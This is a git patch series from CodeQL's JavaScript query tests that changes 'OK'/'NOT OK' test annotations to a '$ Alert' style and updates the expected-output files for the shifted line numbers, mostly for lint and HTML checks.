@@ -11,90 +11,90 @@ function getLastLine(input) { function f1() { return false } - if(f1()){} // OK, whitelisted + if(f1()){} // OK - whitelisted function f2() { return false } - if(!f2()){} // OK, whitelisted + if(!f2()){} // OK - whitelisted function f3() { return false } - if(!!f3()){} // OK, whitelisted + if(!!f3()){} // OK - whitelisted function f4() { return false } - if(f4() || o.p){} // OK, whitelisted + if(f4() || o.p){} // OK - whitelisted function f5() { return false } var v5 = f5(); - if(v5){} // OK, whitelisted + if(v5){} // OK - whitelisted function f6() { return false } var v6 = f6(); - if(!!v6){} // OK, whitelisted + if(!!v6){} // OK - whitelisted })(); (function tooGeneralFunctions(){ function f1(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f1(undefined); f1({}); function f2(x) { - if(x){} // OK, whitelisted + if(x){} // OK - whitelisted } f2(undefined); function f3(x1) { var x2 = x1; - if(x2){} // NOT OK, not whitelisted + if(x2){} // $ Alert - not whitelisted } f3(undefined); function f4(x) { - if(x && o.p){} // OK, whitelisted + if(x && o.p){} // OK - whitelisted } f4(undefined); function f5(x, y) { var xy = o.q? x: y; - if(xy && o.p){} // NOT OK, not whitelisted + if(xy && o.p){} // $ Alert - not whitelisted } f5(undefined, undefined); function f6(x) { - if(!x){} // OK, whitelisted + if(!x){} // OK - whitelisted } f6(true); function f7(x) { - if(!!x){} // OK, whitelisted + if(!!x){} // OK - whitelisted } f7(true); function f8(x, y) { var xy = x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f8(undefined, undefined); function f9(x, y) { var xy = !x || y; - if(xy){} // OK, whitelisted + if(xy){} // OK - whitelisted } f9(undefined, undefined); function f10(x, y) { var xy = !!x || y; - if(xy){} // NOT OK, not whitelisted + if(xy){} // $ Alert - not whitelisted } f10(undefined, undefined); 
@@ -103,7 +103,7 @@ function getLastLine(input) { (function(){ function g(p) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted g(p); } }; @@ -111,7 +111,7 @@ function getLastLine(input) { function f(p = false) { return function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted f(p); } }; @@ -119,7 +119,7 @@ function getLastLine(input) { function h(p = false) { (function() { - if (p) { // OK, whitelisted + if (p) { // OK - whitelisted } }); diff --git a/javascript/ql/test/query-tests/Vue/tst.js b/javascript/ql/test/query-tests/Vue/tst.js index 27fe31488cbf..f0889596112a 100644 --- a/javascript/ql/test/query-tests/Vue/tst.js +++ b/javascript/ql/test/query-tests/Vue/tst.js @@ -1,16 +1,16 @@ let Vue = require('vue'); new Vue( { - created: () => this, // NOT OK + created: () => this, // $ Alert computed: { - x: () => this, // NOT OK - y: { get: () => this }, // NOT OK - z: { set: () => this } // NOT OK + x: () => this, // $ Alert + y: { get: () => this }, // $ Alert + z: { set: () => this } // $ Alert }, methods: { - arrow: () => this, // NOT OK - nonArrow: function() { this; }, // OK - arrowWithoutThis: () => 42, // OK - arrowWithNestedThis: () => (() => this) // OK + arrow: () => this, // $ Alert + nonArrow: function() { this; }, + arrowWithoutThis: () => 42, + arrowWithNestedThis: () => (() => this) } }); diff --git a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js index e6c6509eca6e..652853b992e9 100644 --- a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js +++ b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js @@ -31,7 +31,7 @@ var g2 = function() { return arguments[0] * arguments[1]; } -// OK: only five statements +// OK - only five statements function h() { if (arguments.length == 0) return 23; From 426edd55f2dd3a5fbec9eeb09ea17fe869de12ce Mon Sep 17 00:00:00 2001 
From: Asger F Date: Thu, 6 Feb 2025 14:33:21 +0100 Subject: [PATCH 004/115] JS: Update output after line number change Some OK-style comments had to be moved to the following line, shifting line numbers. In selected range also included the comments themselves. Lastly, the result sets were reordered by the CLI in some cases. --- .../RepeatedInjection.expected | 4 +- .../UnusedAngularDependency.expected | 2 +- .../AngularJS/UseNgSrc/UseNgSrc.expected | 10 +- .../DOM/HTML/AmbiguousIdAttribute.expected | 2 +- .../DOM/HTML/ConflictingAttributes.expected | 4 +- .../DOM/HTML/DuplicateAttributes.expected | 4 +- .../DOM/HTML/MalformedIdAttribute.expected | 4 +- .../DOM/TargetBlank/TargetBlank.expected | 10 +- .../AssignmentToConst.expected | 14 +- .../ClobberingVarInit.expected | 2 +- .../DeadStoreOfGlobal.expected | 2 +- .../DeadStoreOfLocal.expected | 24 +- .../DuplicateVarDecl.expected | 2 +- .../MissingThisQualifier.expected | 12 +- .../MissingVarDecl/MissingVarDecl.expected | 14 +- .../MixedStaticInstanceThisAccess.expected | 6 +- .../TemporalDeadZone.expected | 2 +- .../UnusedParameter/UnusedParameter.expected | 6 +- .../UnusedVariable/UnusedVariable.expected | 2 +- .../EnablingNodeIntegration.expected | 2 +- .../BitwiseSignCheck.expected | 4 +- .../CompareIdenticalValues.expected | 2 +- .../ExprHasNoEffect/ExprHasNoEffect.expected | 16 +- .../HeterogeneousComparison.expected | 100 +- .../ImplicitOperandConversion.expected | 34 +- .../MisspelledIdentifier.expected | 12 +- .../SelfAssignment/SelfAssignment.expected | 6 +- .../SuspiciousInvocation.expected | 2 +- .../WhitespaceContradictsPrecedence.expected | 2 +- .../UndocumentedParameter.expected | 4 +- .../BadTypeof/BadTypeof.expected | 6 +- .../ExpressionClosures.expected | 2 +- .../LengthComparisonOffByOne.expected | 14 +- .../NonLinearPattern.expected | 22 +- .../PropertyWriteOnPrimitive.expected | 6 +- .../SetterIgnoresParameter.expected | 4 +- .../SetterReturn/SetterReturn.expected | 2 +- 
.../SpuriousArguments.expected | 28 +- .../StrictModeCallStackIntrospection.expected | 14 +- .../YieldInNonGenerator.expected | 2 +- .../NonLocalForIn/NonLocalForIn.expected | 10 +- .../ReassignParameterAndUseArguments.expected | 2 +- .../BackrefIntoNegativeLookahead.expected | 2 +- .../UnboundBackref/UnboundBackref.expected | 8 +- .../UnmatchableCaret.expected | 6 +- .../UnmatchableDollar.expected | 8 +- .../CWE-022/TaintedPath/TaintedPath.expected | 744 +++++------ .../UselessUseOfCat/UselessUseOfCat.expected | 2 +- .../Security/CWE-079/DomBasedXss/Xss.expected | 1122 ++++++++--------- .../XssWithAdditionalSources.expected | 934 +++++++------- .../ReflectedXss/ReflectedXss.expected | 232 ++-- .../ReflectedXssWithCustomSanitizer.expected | 44 +- .../UnsafeJQueryPlugin.expected | 22 +- .../CWE-089/untyped/DatabaseAccesses.expected | 82 +- .../CWE-089/untyped/SqlInjection.expected | 788 ++++++------ .../CodeInjection/CodeInjection.expected | 154 +-- .../HeuristicSourceCodeInjection.expected | 112 +- .../CWE-1004/ClientExposedCookie.expected | 16 +- ...ompleteMultiCharacterSanitization.expected | 42 +- .../CWE-1275/SameSiteNoneCookie.expected | 8 +- .../CWE-200/FileAccessToHttp.expected | 18 +- .../CWE-312/BuildArtifactLeak.expected | 6 +- .../CWE-312/CleartextStorage.expected | 6 +- .../Security/CWE-367/FileSystemRace.expected | 2 +- .../ReDoS/PolynomialBackTracking.expected | 42 +- .../CWE-400/ReDoS/PolynomialReDoS.expected | 6 +- .../Security/CWE-400/ReDoS/ReDoS.expected | 34 +- .../ClientSideUrlRedirect.expected | 186 +-- .../ServerSideUrlRedirect.expected | 198 +-- .../query-tests/Security/CWE-611/Xxe.expected | 38 +- .../Security/CWE-614/ClearTextCookie.expected | 26 +- .../Security/CWE-643/XpathInjection.expected | 10 +- .../Security/CWE-730/RegExpInjection.expected | 222 ++-- .../Security/CWE-730/ServerCrash.expected | 66 +- .../Security/CWE-776/XmlBomb.expected | 38 +- .../CWE-807/ConditionalBypass.expected | 2 +- 
.../FunctionalityFromUntrustedSource.expected | 10 +- ...onfusionThroughParameterTampering.expected | 8 +- .../PrototypePollutingMergeCall.expected | 12 +- .../EphemeralLoop/EphemeralLoop.expected | 4 +- .../ImplicitReturn/ImplicitReturn.expected | 6 +- .../InconsistentLoopOrientation.expected | 6 +- .../NestedLoopsSameVariable.expected | 2 +- .../ReturnAssignsLocal.expected | 4 +- .../ReturnOutsideFunction.expected | 2 +- ...iciousUnusedLoopIterationVariable.expected | 8 +- 86 files changed, 2855 insertions(+), 2855 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected index 227dcedf486c..ceb747011ba8 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected 
@@ -2,5 +2,5 @@
 | repeated-injection.js:6:5:6:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:8:54:8:73 | ['name', $Injected2] | dependency injections |
 | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:11:5:11:22 | $Injected3.$inject | dependency injections |
 | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:12:5:12:22 | $Injected3.$inject | dependency injections |
-| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections |
-| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections |
+| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections |
+| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections |
diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected
index d5b4c267c39e..2ca924302a23 100644
--- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected
+++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected
@@ -2,4 +2,4 @@
 | unused-angular-dependency.js:14:14:14:39 | ["unuse ... n() {}] | This function has 0 parameters, but 1 dependency is injected into it. |
 | unused-angular-dependency.js:16:14:16:53 | ["used2 ... d2) {}] | This function has 1 parameter, but 2 dependencies are injected into it. |
 | unused-angular-dependency.js:17:14:17:52 | ["unuse ... n() {}] | This function has 0 parameters, but 2 dependencies are injected into it. |
-| unused-angular-dependency.js:18:14:18:105 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. |
+| unused-angular-dependency.js:18:14:18:106 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. |
diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected
index 5b5f5ffa00c0..bd93c005dec1 100644
--- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected
+++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected
@@ -1,5 +1,5 @@
-| tst2.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. |
-| tst.html:8:6:8:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. |
-| tst.html:10:40:10:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. |
-| tst.html:11:10:11:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. |
-| tst_fragment.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. |
+| tst2.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. |
+| tst.html:7:6:7:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. |
+| tst.html:9:40:9:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. |
+| tst.html:10:10:10:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. |
+| tst_fragment.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. |
diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected
index c013ea098297..3f5ebd72f8ec 100644
--- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected
+++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected
@@ -1,3 +1,3 @@
 | AmbiguousIdAttribute.html:4:5:4:14 | id=first | This element has the same id as $@. | AmbiguousIdAttribute.html:5:5:5:14 | id=first | another element |
 | AmbiguousIdAttribute_fragment.html:2:7:2:16 | id=first | This element has the same id as $@. | AmbiguousIdAttribute_fragment.html:3:7:3:16 | id=first | another element |
-| tst.js:22:22:22:33 | id="theDiff" | This element has the same id as $@. | tst.js:22:46:22:57 | id="theDiff" | another element |
+| tst.js:17:22:17:33 | id="theDiff" | This element has the same id as $@. | tst.js:17:46:17:57 | id="theDiff" | another element |
diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected
index 46ff575e355c..4b9243036e4f 100644
--- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected
+++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected
@@ -1,3 +1,3 @@
 | ConflictingAttributes.html:1:4:1:27 | href=http://semmle.com | This attribute has the same name as $@ of the same element, but a different value. | ConflictingAttributes.html:1:29:1:53 | href=https://semmle.com | another attribute |
-| tst.js:6:4:6:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:6:29:6:53 | href="h ... le.com" | another attribute |
-| tst.js:16:4:16:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:16:29:16:46 | href={someValue()} | another attribute |
+| tst.js:5:4:5:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:5:29:5:53 | href="h ... le.com" | another attribute |
+| tst.js:12:4:12:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:12:29:12:46 | href={someValue()} | another attribute |
diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected
index 988c4925a461..aa0a43e5d1be 100644
--- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected
+++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected
@@ -1,3 +1,3 @@
 | DuplicateAttributes.html:1:4:1:28 | href=https://semmle.com | This attribute $@. | DuplicateAttributes.html:1:30:1:54 | href=https://semmle.com | is duplicated later |
-| tst.js:9:4:9:28 | href="h ... le.com" | This attribute $@. | tst.js:9:30:9:54 | href="h ... le.com" | is duplicated later |
-| tst.js:25:17:25:28 | id="theDiff" | This attribute $@. | tst.js:25:30:25:41 | id="theDiff" | is duplicated later |
+| tst.js:7:4:7:28 | href="h ... le.com" | This attribute $@. | tst.js:7:30:7:54 | href="h ... le.com" | is duplicated later |
+| tst.js:19:17:19:28 | id="theDiff" | This attribute $@. | tst.js:19:30:19:41 | id="theDiff" | is duplicated later |
diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected
index 96d365e5dc5e..fbbfcc95d23b 100644
--- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected
+++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected
@@ -1,5 +1,5 @@
 | AmbiguousIdAttributeGood.html:8:5:8:19 | id=invalid id | The value of the id attribute must not contain any space characters. |
 | AmbiguousIdAttributeGood.html:9:5:9:19 | id=invalid id | The value of the id attribute must not contain any space characters. |
 | MalformedIdAttribute.html:1:6:1:27 | id=heading important | The value of the id attribute must not contain any space characters. |
-| tst.js:12:6:12:10 | id="" | The value of the id attribute must contain at least one character. |
-| tst.js:13:6:13:13 | id="a b" | The value of the id attribute must not contain any space characters. |
+| tst.js:9:6:9:10 | id="" | The value of the id attribute must contain at least one character. |
+| tst.js:10:6:10:13 | id="a b" | The value of the id attribute must not contain any space characters. |
diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected
index 1fba6292f897..531f431b86f9 100644
--- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected
+++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected
@@ -2,8 +2,8 @@
 | tst.html:24:1:24:48 | ... | External links without noopener/noreferrer are a potential security risk. |
 | tst.html:25:1:25:36 | ... | External links without noopener/noreferrer are a potential security risk. |
 | tst.html:30:1:30:61 | ... | External links without noopener/noreferrer are a potential security risk. |
-| tst.js:18:1:18:43 | | External links without noopener/noreferrer are a potential security risk. |
-| tst.js:19:1:19:58 | | External links without noopener/noreferrer are a potential security risk. |
-| tst.js:20:1:20:51 | | External links without noopener/noreferrer are a potential security risk. |
-| tst.js:33:12:33:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. |
-| tst.js:42:12:42:20 | $("") | External links without noopener/noreferrer are a potential security risk. |
+| tst.js:17:1:17:43 | | External links without noopener/noreferrer are a potential security risk. |
+| tst.js:18:1:18:58 | | External links without noopener/noreferrer are a potential security risk. |
+| tst.js:19:1:19:51 | | External links without noopener/noreferrer are a potential security risk. |
+| tst.js:31:12:31:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. |
+| tst.js:39:12:39:20 | $("") | External links without noopener/noreferrer are a potential security risk. |
diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected
index b74841153cb3..7e457d64b08e 100644
--- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected
+++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected
@@ -1,7 +1,7 @@ -| classes.js:4:1:4:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | -| functions.js:4:10:4:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | -| tst.js:4:1:4:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:7:1:7:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:10:5:10:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:13:1:13:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:25:10:25:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:24:5:24:19 | const c = null; | declared | +| classes.js:3:1:3:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | +| functions.js:3:10:3:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | +| tst.js:3:1:3:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:5:1:5:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:7:5:7:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:9:1:9:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:21:10:21:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:20:5:20:19 | const c = null; | declared | 
diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected index 7063b316a62e..501e442bcbf2 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected @@ -1 +1 @@ -| tst.js:3:24:3:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:3:9:3:21 | key = iter[0] | earlier initialization | +| tst.js:2:24:2:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:2:9:2:21 | key = iter[0] | earlier initialization | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected index 3c4777ca5a6f..d4f34fa75983 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:1 | g | This definition of g is useless, since its value is never read. | +| tst.js:1:1:1:1 | g | This definition of g is useless, since its value is never read. | | worker.js:3:1:3:9 | onmissage | This definition of onmissage is useless, since its value is never read. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected index 88b5fc55b25c..8d5b7af35dab 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected 
@@ -1,13 +1,13 @@ | overload.ts:10:12:10:14 | baz | The value assigned to baz here is unused. | -| tst2.js:26:9:26:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst2.js:28:9:28:14 | x = 42 | The value assigned to x here is unused. | -| tst3.js:2:1:2:36 | exports ... a: 23 } | The value assigned to exports here is unused. | -| tst3b.js:2:18:2:36 | exports = { a: 23 } | The value assigned to exports here is unused. | -| tst.js:6:2:6:7 | y = 23 | The value assigned to y here is unused. | -| tst.js:13:6:13:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | -| tst.js:13:14:13:19 | a = 42 | The value assigned to a here is unused. | -| tst.js:45:6:45:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:51:6:51:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:132:7:132:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | -| tst.js:162:6:162:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | -| tst.js:172:7:172:17 | nSign = foo | The value assigned to nSign here is unused. | +| tst2.js:25:9:25:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst2.js:27:9:27:14 | x = 42 | The value assigned to x here is unused. | +| tst3.js:1:1:1:36 | exports ... a: 23 } | The value assigned to exports here is unused. | +| tst3b.js:1:18:1:36 | exports = { a: 23 } | The value assigned to exports here is unused. | +| tst.js:5:2:5:7 | y = 23 | The value assigned to y here is unused. | +| tst.js:11:6:11:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | +| tst.js:11:14:11:19 | a = 42 | The value assigned to a here is unused. | +| tst.js:43:6:43:11 | x = 23 | The initial value of x is unused, since it is always overwritten. 
| +| tst.js:49:6:49:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:130:7:130:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | +| tst.js:160:6:160:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | +| tst.js:170:7:170:17 | nSign = foo | The value assigned to nSign here is unused. | diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected index 60d8f7f619e3..26ac43a1dfa2 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected @@ -1 +1 @@ -| tst.js:2:11:2:16 | a = 42 | Variable a has already $@. | tst.js:2:5:2:5 | a | been previously declared | +| tst.js:1:11:1:16 | a = 42 | Variable a has already $@. | tst.js:1:5:1:5 | a | been previously declared | diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected index c9bd449006f4..60a075561957 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected 
@@ -1,10 +1,10 @@ | abstract-missing.ts:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | abstract-missing.ts:6:3:6:32 | abstrac ... ties(); | setAudioProperties | -| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... K\\n } | m | +| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... ;\\n } | m | | missing1.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing1.js:6:3:7:3 | setAudi ... (){\\n } | setAudioProperties | | missing2.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing2.js:7:3:8:3 | static ... (){\\n } | setAudioProperties | -| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... OK\\n } | globalFunction | -| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... OK\\n } | topNamespaceFunction | -| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... OK\\n } | childNamespaceFunction | -| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... K\\n } | globalFunction | -| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... 
K\\n } | globalFunction | +| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... ert\\n } | globalFunction | +| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... ert\\n } | topNamespaceFunction | +| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... ert\\n } | childNamespaceFunction | +| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... t\\n } | globalFunction | +| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... t\\n } | globalFunction | | not-ignored-by-jslint.js:4:5:4:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | not-ignored-by-jslint.js:7:3:8:3 | setAudi ... (){\\n } | setAudioProperties | diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected index f9a35141d67d..a679cb095a7c 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected 
@@ -1,9 +1,9 @@ -| test.js:6:7:6:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:14:7:14:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:23:2:23:2 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:54:10:54:10 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:60:6:60:6 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:66:2:66:2 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:72:9:72:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | +| test.js:5:7:5:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:12:7:12:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:20:2:20:2 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:50:10:50:10 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:55:6:55:6 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:60:2:60:2 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:66:9:66:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | | tst3.js:7:10:7:10 | x | Variable x is used like a local variable, but is missing a declaration. | | tst3.js:7:16:7:19 | rest | Variable rest is used like a local variable, but is missing a declaration. | diff --git a/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected 